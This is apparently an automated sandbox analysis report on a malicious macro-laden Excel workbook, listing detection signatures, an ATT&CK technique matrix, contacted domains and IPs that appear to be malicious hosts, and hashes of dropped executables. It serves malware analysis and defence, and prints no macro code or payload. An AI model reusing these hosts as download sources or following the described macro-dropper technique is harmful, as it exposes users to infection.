Analysis Report documents-351331057.xlsm
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | ReversingLabs: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (creates forbidden files) | Show sources |
Source: | File created: | Jump to behavior |
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Binary string: |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | DLL Side-Loading1 | Process Injection1 | Masquerading121 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol14 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer3 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
10% | ReversingLabs |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
runolfsson-jayde07s.ru.com | 8.211.4.209 | true | false | unknown | |
cremin-ian07u.ru.com | 8.211.4.209 | true | false | unknown | |
cesiroinsurance.com | 67.222.38.97 | true | false | unknown | |
shalombaptistchapel.com | 162.251.80.27 | true | false | unknown | |
innermetransformation.com | 173.201.252.173 | true | false | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.251.80.27 | shalombaptistchapel.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false | |
67.222.38.97 | cesiroinsurance.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
173.201.252.173 | innermetransformation.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false | |
8.211.4.209 | runolfsson-jayde07s.ru.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 384712 |
Start date: | 09.04.2021 |
Start time: | 16:49:37 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 17s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | documents-351331057.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.expl.evad.winXLSM@11/14@5/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
162.251.80.27 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
67.222.38.97 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
173.201.252.173 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
8.211.4.209 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
cremin-ian07u.ru.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
innermetransformation.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
shalombaptistchapel.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
runolfsson-jayde07s.ru.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
cesiroinsurance.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
AS-26496-GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133170 |
Entropy (8bit): | 5.371011445501101 |
Encrypted: | false |
SSDEEP: | 1536:ucQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:+VQ9DQW+zTXiJ |
MD5: | 61D62DEE0BA3D5AA415AD796F0B7CD38 |
SHA1: | 914F9B5EE7BEB705D3137EFC1D4C9CD1ABFB2B6D |
SHA-256: | 38153943035E810F6CC0B43D0995DD16C561B1927D3472B8AEFB1595D9C6A5BE |
SHA-512: | 95A50013C647671C9A3BBAA911BE1F6E6EA0FFBD0939B2836DB09743DC33D32DEC8F12EADB4E61CF8649ADCC9C7EEB5934425A30FF390E3A3247E262B18AB2DE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
